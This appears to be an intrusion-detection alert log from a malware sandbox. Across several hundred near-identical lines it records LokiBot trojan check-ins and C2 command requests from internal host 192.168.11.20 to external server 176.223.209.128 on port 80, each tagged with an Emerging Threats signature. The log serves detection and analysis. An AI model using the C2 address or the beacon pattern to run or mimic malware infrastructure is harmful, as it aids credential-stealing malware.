                                              11/25/21-10:53:15.460895TCP2025381ET TROJAN LokiBot Checkin5044780192.168.11.20176.223.209.128
                                              11/25/21-10:53:15.460895TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25044780192.168.11.20176.223.209.128
                                              11/25/21-10:53:15.970796TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15044880192.168.11.20176.223.209.128
                                              11/25/21-10:53:15.970796TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5044880192.168.11.20176.223.209.128
                                              11/25/21-10:53:15.970796TCP2025381ET TROJAN LokiBot Checkin5044880192.168.11.20176.223.209.128
                                              11/25/21-10:53:15.970796TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25044880192.168.11.20176.223.209.128
                                              11/25/21-10:53:16.443543TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15044980192.168.11.20176.223.209.128
                                              11/25/21-10:53:16.443543TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5044980192.168.11.20176.223.209.128
                                              11/25/21-10:53:16.443543TCP2025381ET TROJAN LokiBot Checkin5044980192.168.11.20176.223.209.128
                                              11/25/21-10:53:16.443543TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25044980192.168.11.20176.223.209.128
                                              11/25/21-10:53:16.946928TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15045080192.168.11.20176.223.209.128
                                              11/25/21-10:53:16.946928TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5045080192.168.11.20176.223.209.128
                                              11/25/21-10:53:16.946928TCP2025381ET TROJAN LokiBot Checkin5045080192.168.11.20176.223.209.128
                                              11/25/21-10:53:16.946928TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25045080192.168.11.20176.223.209.128
                                              11/25/21-10:53:17.460876TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15045180192.168.11.20176.223.209.128
                                              11/25/21-10:53:17.460876TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5045180192.168.11.20176.223.209.128
                                              11/25/21-10:53:17.460876TCP2025381ET TROJAN LokiBot Checkin5045180192.168.11.20176.223.209.128
                                              11/25/21-10:53:17.460876TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25045180192.168.11.20176.223.209.128
                                              11/25/21-10:53:17.961556TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15045280192.168.11.20176.223.209.128
                                              11/25/21-10:53:17.961556TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5045280192.168.11.20176.223.209.128
                                              11/25/21-10:53:17.961556TCP2025381ET TROJAN LokiBot Checkin5045280192.168.11.20176.223.209.128
                                              11/25/21-10:53:17.961556TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25045280192.168.11.20176.223.209.128
                                              11/25/21-10:53:18.455844TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15045380192.168.11.20176.223.209.128
                                              11/25/21-10:53:18.455844TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5045380192.168.11.20176.223.209.128
                                              11/25/21-10:53:18.455844TCP2025381ET TROJAN LokiBot Checkin5045380192.168.11.20176.223.209.128
                                              11/25/21-10:53:18.455844TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25045380192.168.11.20176.223.209.128
                                              11/25/21-10:53:18.884130TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15045480192.168.11.20176.223.209.128
                                              11/25/21-10:53:18.884130TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5045480192.168.11.20176.223.209.128
                                              11/25/21-10:53:18.884130TCP2025381ET TROJAN LokiBot Checkin5045480192.168.11.20176.223.209.128
                                              11/25/21-10:53:18.884130TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25045480192.168.11.20176.223.209.128
                                              11/25/21-10:53:19.409172TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15045580192.168.11.20176.223.209.128
                                              11/25/21-10:53:19.409172TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5045580192.168.11.20176.223.209.128
                                              11/25/21-10:53:19.409172TCP2025381ET TROJAN LokiBot Checkin5045580192.168.11.20176.223.209.128
                                              11/25/21-10:53:19.409172TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25045580192.168.11.20176.223.209.128
                                              11/25/21-10:53:19.898078TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15045680192.168.11.20176.223.209.128
                                              11/25/21-10:53:19.898078TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5045680192.168.11.20176.223.209.128
                                              11/25/21-10:53:19.898078TCP2025381ET TROJAN LokiBot Checkin5045680192.168.11.20176.223.209.128
                                              11/25/21-10:53:19.898078TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25045680192.168.11.20176.223.209.128
                                              11/25/21-10:53:20.393989TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15045880192.168.11.20176.223.209.128
                                              11/25/21-10:53:20.393989TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5045880192.168.11.20176.223.209.128
                                              11/25/21-10:53:20.393989TCP2025381ET TROJAN LokiBot Checkin5045880192.168.11.20176.223.209.128
                                              11/25/21-10:53:20.393989TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25045880192.168.11.20176.223.209.128
                                              11/25/21-10:53:20.908345TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15045980192.168.11.20176.223.209.128
                                              11/25/21-10:53:20.908345TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5045980192.168.11.20176.223.209.128
                                              11/25/21-10:53:20.908345TCP2025381ET TROJAN LokiBot Checkin5045980192.168.11.20176.223.209.128
                                              11/25/21-10:53:20.908345TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25045980192.168.11.20176.223.209.128
                                              11/25/21-10:53:21.387957TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15046080192.168.11.20176.223.209.128
                                              11/25/21-10:53:21.387957TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5046080192.168.11.20176.223.209.128
                                              11/25/21-10:53:21.387957TCP2025381ET TROJAN LokiBot Checkin5046080192.168.11.20176.223.209.128
                                              11/25/21-10:53:21.387957TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25046080192.168.11.20176.223.209.128
                                              11/25/21-10:53:21.894494TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15046180192.168.11.20176.223.209.128
                                              11/25/21-10:53:21.894494TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5046180192.168.11.20176.223.209.128
                                              11/25/21-10:53:21.894494TCP2025381ET TROJAN LokiBot Checkin5046180192.168.11.20176.223.209.128
                                              11/25/21-10:53:21.894494TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25046180192.168.11.20176.223.209.128
                                              11/25/21-10:53:22.409035TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15046280192.168.11.20176.223.209.128
                                              11/25/21-10:53:22.409035TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5046280192.168.11.20176.223.209.128
                                              11/25/21-10:53:22.409035TCP2025381ET TROJAN LokiBot Checkin5046280192.168.11.20176.223.209.128
                                              11/25/21-10:53:22.409035TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25046280192.168.11.20176.223.209.128
                                              11/25/21-10:53:22.929210TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15046380192.168.11.20176.223.209.128
                                              11/25/21-10:53:22.929210TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5046380192.168.11.20176.223.209.128
                                              11/25/21-10:53:22.929210TCP2025381ET TROJAN LokiBot Checkin5046380192.168.11.20176.223.209.128
                                              11/25/21-10:53:22.929210TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25046380192.168.11.20176.223.209.128
                                              11/25/21-10:53:23.429112TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15046480192.168.11.20176.223.209.128
                                              11/25/21-10:53:23.429112TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5046480192.168.11.20176.223.209.128
                                              11/25/21-10:53:23.429112TCP2025381ET TROJAN LokiBot Checkin5046480192.168.11.20176.223.209.128
                                              11/25/21-10:53:23.429112TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25046480192.168.11.20176.223.209.128
                                              11/25/21-10:53:23.867977TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15046580192.168.11.20176.223.209.128
                                              11/25/21-10:53:23.867977TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5046580192.168.11.20176.223.209.128
                                              11/25/21-10:53:23.867977TCP2025381ET TROJAN LokiBot Checkin5046580192.168.11.20176.223.209.128
                                              11/25/21-10:53:23.867977TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25046580192.168.11.20176.223.209.128
                                              11/25/21-10:53:24.376610TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15046680192.168.11.20176.223.209.128
                                              11/25/21-10:53:24.376610TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5046680192.168.11.20176.223.209.128
                                              11/25/21-10:53:24.376610TCP2025381ET TROJAN LokiBot Checkin5046680192.168.11.20176.223.209.128
                                              11/25/21-10:53:24.376610TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25046680192.168.11.20176.223.209.128
                                              11/25/21-10:53:24.847520TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15046780192.168.11.20176.223.209.128
                                              11/25/21-10:53:24.847520TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5046780192.168.11.20176.223.209.128
                                              11/25/21-10:53:24.847520TCP2025381ET TROJAN LokiBot Checkin5046780192.168.11.20176.223.209.128
                                              11/25/21-10:53:24.847520TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25046780192.168.11.20176.223.209.128
                                              11/25/21-10:53:25.354969TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15046880192.168.11.20176.223.209.128
                                              11/25/21-10:53:25.354969TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5046880192.168.11.20176.223.209.128
                                              11/25/21-10:53:25.354969TCP2025381ET TROJAN LokiBot Checkin5046880192.168.11.20176.223.209.128
                                              11/25/21-10:53:25.354969TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25046880192.168.11.20176.223.209.128
                                              11/25/21-10:53:25.882854TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15046980192.168.11.20176.223.209.128
                                              11/25/21-10:53:25.882854TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5046980192.168.11.20176.223.209.128
                                              11/25/21-10:53:25.882854TCP2025381ET TROJAN LokiBot Checkin5046980192.168.11.20176.223.209.128
                                              11/25/21-10:53:25.882854TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25046980192.168.11.20176.223.209.128
                                              11/25/21-10:53:26.385596TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15047080192.168.11.20176.223.209.128
                                              11/25/21-10:53:26.385596TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5047080192.168.11.20176.223.209.128
                                              11/25/21-10:53:26.385596TCP2025381ET TROJAN LokiBot Checkin5047080192.168.11.20176.223.209.128
                                              11/25/21-10:53:26.385596TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25047080192.168.11.20176.223.209.128
                                              11/25/21-10:53:26.886544TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15047180192.168.11.20176.223.209.128
                                              11/25/21-10:53:26.886544TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5047180192.168.11.20176.223.209.128
                                              11/25/21-10:53:26.886544TCP2025381ET TROJAN LokiBot Checkin5047180192.168.11.20176.223.209.128
                                              11/25/21-10:53:26.886544TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25047180192.168.11.20176.223.209.128
                                              11/25/21-10:53:27.350877TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15047280192.168.11.20176.223.209.128
                                              11/25/21-10:53:27.350877TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5047280192.168.11.20176.223.209.128
                                              11/25/21-10:53:27.350877TCP2025381ET TROJAN LokiBot Checkin5047280192.168.11.20176.223.209.128
                                              11/25/21-10:53:27.350877TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25047280192.168.11.20176.223.209.128
                                              11/25/21-10:53:27.846663TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15047380192.168.11.20176.223.209.128
                                              11/25/21-10:53:27.846663TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5047380192.168.11.20176.223.209.128
                                              11/25/21-10:53:27.846663TCP2025381ET TROJAN LokiBot Checkin5047380192.168.11.20176.223.209.128
                                              11/25/21-10:53:27.846663TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25047380192.168.11.20176.223.209.128
                                              11/25/21-10:53:28.355336TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15047480192.168.11.20176.223.209.128
                                              11/25/21-10:53:28.355336TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5047480192.168.11.20176.223.209.128
                                              11/25/21-10:53:28.355336TCP2025381ET TROJAN LokiBot Checkin5047480192.168.11.20176.223.209.128
                                              11/25/21-10:53:28.355336TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25047480192.168.11.20176.223.209.128
                                              11/25/21-10:53:28.862322TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15047580192.168.11.20176.223.209.128
                                              11/25/21-10:53:28.862322TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5047580192.168.11.20176.223.209.128
                                              11/25/21-10:53:28.862322TCP2025381ET TROJAN LokiBot Checkin5047580192.168.11.20176.223.209.128
                                              11/25/21-10:53:28.862322TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25047580192.168.11.20176.223.209.128
                                              11/25/21-10:53:29.372843TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15047680192.168.11.20176.223.209.128
                                              11/25/21-10:53:29.372843TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5047680192.168.11.20176.223.209.128
                                              11/25/21-10:53:29.372843TCP2025381ET TROJAN LokiBot Checkin5047680192.168.11.20176.223.209.128
                                              11/25/21-10:53:29.372843TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25047680192.168.11.20176.223.209.128
                                              11/25/21-10:53:29.843203TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15047780192.168.11.20176.223.209.128
                                              11/25/21-10:53:29.843203TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5047780192.168.11.20176.223.209.128
                                              11/25/21-10:53:29.843203TCP2025381ET TROJAN LokiBot Checkin5047780192.168.11.20176.223.209.128
                                              11/25/21-10:53:29.843203TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25047780192.168.11.20176.223.209.128
                                              11/25/21-10:53:30.308855TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15047880192.168.11.20176.223.209.128
                                              11/25/21-10:53:30.308855TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5047880192.168.11.20176.223.209.128
                                              11/25/21-10:53:30.308855TCP2025381ET TROJAN LokiBot Checkin5047880192.168.11.20176.223.209.128
                                              11/25/21-10:53:30.308855TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25047880192.168.11.20176.223.209.128
                                              11/25/21-10:53:30.786736TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15047980192.168.11.20176.223.209.128
                                              11/25/21-10:53:30.786736TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5047980192.168.11.20176.223.209.128
                                              11/25/21-10:53:30.786736TCP2025381ET TROJAN LokiBot Checkin5047980192.168.11.20176.223.209.128
                                              11/25/21-10:53:30.786736TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25047980192.168.11.20176.223.209.128
                                              11/25/21-10:53:31.296934TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15048080192.168.11.20176.223.209.128
                                              11/25/21-10:53:31.296934TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5048080192.168.11.20176.223.209.128
                                              11/25/21-10:53:31.296934TCP2025381ET TROJAN LokiBot Checkin5048080192.168.11.20176.223.209.128
                                              11/25/21-10:53:31.296934TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25048080192.168.11.20176.223.209.128
                                              11/25/21-10:53:31.808200TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15048180192.168.11.20176.223.209.128
                                              11/25/21-10:53:31.808200TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5048180192.168.11.20176.223.209.128
                                              11/25/21-10:53:31.808200TCP2025381ET TROJAN LokiBot Checkin5048180192.168.11.20176.223.209.128
                                              11/25/21-10:53:31.808200TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25048180192.168.11.20176.223.209.128
                                              11/25/21-10:53:32.331859TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15048280192.168.11.20176.223.209.128
                                              11/25/21-10:53:32.331859TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5048280192.168.11.20176.223.209.128
                                              11/25/21-10:53:32.331859TCP2025381ET TROJAN LokiBot Checkin5048280192.168.11.20176.223.209.128
                                              11/25/21-10:53:32.331859TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25048280192.168.11.20176.223.209.128
                                              11/25/21-10:53:32.797645TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15048380192.168.11.20176.223.209.128
                                              11/25/21-10:53:32.797645TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5048380192.168.11.20176.223.209.128
                                              11/25/21-10:53:32.797645TCP2025381ET TROJAN LokiBot Checkin5048380192.168.11.20176.223.209.128
                                              11/25/21-10:53:32.797645TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25048380192.168.11.20176.223.209.128
                                              11/25/21-10:53:33.325394TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15048480192.168.11.20176.223.209.128
                                              11/25/21-10:53:33.325394TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5048480192.168.11.20176.223.209.128
                                              11/25/21-10:53:33.325394TCP2025381ET TROJAN LokiBot Checkin5048480192.168.11.20176.223.209.128
                                              11/25/21-10:53:33.325394TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25048480192.168.11.20176.223.209.128
                                              11/25/21-10:53:33.845490TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15048580192.168.11.20176.223.209.128
                                              11/25/21-10:53:33.845490TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5048580192.168.11.20176.223.209.128
                                              11/25/21-10:53:33.845490TCP2025381ET TROJAN LokiBot Checkin5048580192.168.11.20176.223.209.128
                                              11/25/21-10:53:33.845490TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25048580192.168.11.20176.223.209.128
                                              11/25/21-10:53:34.266818TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15048680192.168.11.20176.223.209.128
                                              11/25/21-10:53:34.266818TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5048680192.168.11.20176.223.209.128
                                              11/25/21-10:53:34.266818TCP2025381ET TROJAN LokiBot Checkin5048680192.168.11.20176.223.209.128
                                              11/25/21-10:53:34.266818TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25048680192.168.11.20176.223.209.128
                                              11/25/21-10:53:34.777722TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15048780192.168.11.20176.223.209.128
                                              11/25/21-10:53:34.777722TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5048780192.168.11.20176.223.209.128
                                              11/25/21-10:53:34.777722TCP2025381ET TROJAN LokiBot Checkin5048780192.168.11.20176.223.209.128
                                              11/25/21-10:53:34.777722TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25048780192.168.11.20176.223.209.128
                                              11/25/21-10:53:35.308824TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15048880192.168.11.20176.223.209.128
                                              11/25/21-10:53:35.308824TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5048880192.168.11.20176.223.209.128
                                              11/25/21-10:53:35.308824TCP2025381ET TROJAN LokiBot Checkin5048880192.168.11.20176.223.209.128
                                              11/25/21-10:53:35.308824TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25048880192.168.11.20176.223.209.128
                                              11/25/21-10:53:35.762265TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15048980192.168.11.20176.223.209.128
                                              11/25/21-10:53:35.762265TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5048980192.168.11.20176.223.209.128
                                              11/25/21-10:53:35.762265TCP2025381ET TROJAN LokiBot Checkin5048980192.168.11.20176.223.209.128
                                              11/25/21-10:53:35.762265TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25048980192.168.11.20176.223.209.128
                                              11/25/21-10:53:36.258620TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15049080192.168.11.20176.223.209.128
                                              11/25/21-10:53:36.258620TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5049080192.168.11.20176.223.209.128
                                              11/25/21-10:53:36.258620TCP2025381ET TROJAN LokiBot Checkin5049080192.168.11.20176.223.209.128
                                              11/25/21-10:53:36.258620TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25049080192.168.11.20176.223.209.128
                                              11/25/21-10:53:36.772211TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15049180192.168.11.20176.223.209.128
                                              11/25/21-10:53:36.772211TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5049180192.168.11.20176.223.209.128
                                              11/25/21-10:53:36.772211TCP2025381ET TROJAN LokiBot Checkin5049180192.168.11.20176.223.209.128
                                              11/25/21-10:53:36.772211TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25049180192.168.11.20176.223.209.128
                                              11/25/21-10:53:37.268575TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15049280192.168.11.20176.223.209.128
                                              11/25/21-10:53:37.268575TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5049280192.168.11.20176.223.209.128
                                              11/25/21-10:53:37.268575TCP2025381ET TROJAN LokiBot Checkin5049280192.168.11.20176.223.209.128
                                              11/25/21-10:53:37.268575TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25049280192.168.11.20176.223.209.128
                                              11/25/21-10:53:37.770352TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15049380192.168.11.20176.223.209.128
                                              11/25/21-10:53:37.770352TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5049380192.168.11.20176.223.209.128
                                              11/25/21-10:53:37.770352TCP2025381ET TROJAN LokiBot Checkin5049380192.168.11.20176.223.209.128
                                              11/25/21-10:53:37.770352TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25049380192.168.11.20176.223.209.128
                                              11/25/21-10:53:38.269614TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15049480192.168.11.20176.223.209.128
                                              11/25/21-10:53:38.269614TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5049480192.168.11.20176.223.209.128
                                              11/25/21-10:53:38.269614TCP2025381ET TROJAN LokiBot Checkin5049480192.168.11.20176.223.209.128
                                              11/25/21-10:53:38.269614TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25049480192.168.11.20176.223.209.128
                                              11/25/21-10:53:38.709614TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15049580192.168.11.20176.223.209.128
                                              11/25/21-10:53:38.709614TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5049580192.168.11.20176.223.209.128
                                              11/25/21-10:53:38.709614TCP2025381ET TROJAN LokiBot Checkin5049580192.168.11.20176.223.209.128
                                              11/25/21-10:53:38.709614TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25049580192.168.11.20176.223.209.128
                                              11/25/21-10:53:39.207845TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15049680192.168.11.20176.223.209.128
                                              11/25/21-10:53:39.207845TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5049680192.168.11.20176.223.209.128
                                              11/25/21-10:53:39.207845TCP2025381ET TROJAN LokiBot Checkin5049680192.168.11.20176.223.209.128
                                              11/25/21-10:53:39.207845TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25049680192.168.11.20176.223.209.128
                                              11/25/21-10:53:39.732608TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15049780192.168.11.20176.223.209.128
                                              11/25/21-10:53:39.732608TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5049780192.168.11.20176.223.209.128
                                              11/25/21-10:53:39.732608TCP2025381ET TROJAN LokiBot Checkin5049780192.168.11.20176.223.209.128
                                              11/25/21-10:53:39.732608TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25049780192.168.11.20176.223.209.128
                                              11/25/21-10:53:40.243964TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15049880192.168.11.20176.223.209.128
                                              11/25/21-10:53:40.243964TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5049880192.168.11.20176.223.209.128
                                              11/25/21-10:53:40.243964TCP2025381ET TROJAN LokiBot Checkin5049880192.168.11.20176.223.209.128
                                              11/25/21-10:53:40.243964TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25049880192.168.11.20176.223.209.128
                                              11/25/21-10:53:40.753145TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15049980192.168.11.20176.223.209.128
                                              11/25/21-10:53:40.753145TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5049980192.168.11.20176.223.209.128
                                              11/25/21-10:53:40.753145TCP2025381ET TROJAN LokiBot Checkin5049980192.168.11.20176.223.209.128
                                              11/25/21-10:53:40.753145TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25049980192.168.11.20176.223.209.128
                                              11/25/21-10:53:41.238328TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15050080192.168.11.20176.223.209.128
                                              11/25/21-10:53:41.238328TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5050080192.168.11.20176.223.209.128
                                              11/25/21-10:53:41.238328TCP2025381ET TROJAN LokiBot Checkin5050080192.168.11.20176.223.209.128
                                              11/25/21-10:53:41.238328TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25050080192.168.11.20176.223.209.128
                                              11/25/21-10:53:41.681848TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15050180192.168.11.20176.223.209.128
                                              11/25/21-10:53:41.681848TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5050180192.168.11.20176.223.209.128
                                              11/25/21-10:53:41.681848TCP2025381ET TROJAN LokiBot Checkin5050180192.168.11.20176.223.209.128
                                              11/25/21-10:53:41.681848TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25050180192.168.11.20176.223.209.128
                                              11/25/21-10:53:42.195313TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15050280192.168.11.20176.223.209.128
                                              11/25/21-10:53:42.195313TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5050280192.168.11.20176.223.209.128
                                              11/25/21-10:53:42.195313TCP2025381ET TROJAN LokiBot Checkin5050280192.168.11.20176.223.209.128
                                              11/25/21-10:53:42.195313TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25050280192.168.11.20176.223.209.128
                                              11/25/21-10:53:42.680123TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15050380192.168.11.20176.223.209.128
                                              11/25/21-10:53:42.680123TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5050380192.168.11.20176.223.209.128
                                              11/25/21-10:53:42.680123TCP2025381ET TROJAN LokiBot Checkin5050380192.168.11.20176.223.209.128
                                              11/25/21-10:53:42.680123TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25050380192.168.11.20176.223.209.128
                                              11/25/21-10:53:43.187163TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15050480192.168.11.20176.223.209.128
                                              11/25/21-10:53:43.187163TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5050480192.168.11.20176.223.209.128
                                              11/25/21-10:53:43.187163TCP2025381ET TROJAN LokiBot Checkin5050480192.168.11.20176.223.209.128
                                              11/25/21-10:53:43.187163TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25050480192.168.11.20176.223.209.128
                                              11/25/21-10:53:43.695678TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15050580192.168.11.20176.223.209.128
                                              11/25/21-10:53:43.695678TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5050580192.168.11.20176.223.209.128
                                              11/25/21-10:53:43.695678TCP2025381ET TROJAN LokiBot Checkin5050580192.168.11.20176.223.209.128
                                              11/25/21-10:53:43.695678TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25050580192.168.11.20176.223.209.128
                                              11/25/21-10:53:44.139015TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15050680192.168.11.20176.223.209.128
                                              11/25/21-10:53:44.139015TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5050680192.168.11.20176.223.209.128
                                              11/25/21-10:53:44.139015TCP2025381ET TROJAN LokiBot Checkin5050680192.168.11.20176.223.209.128
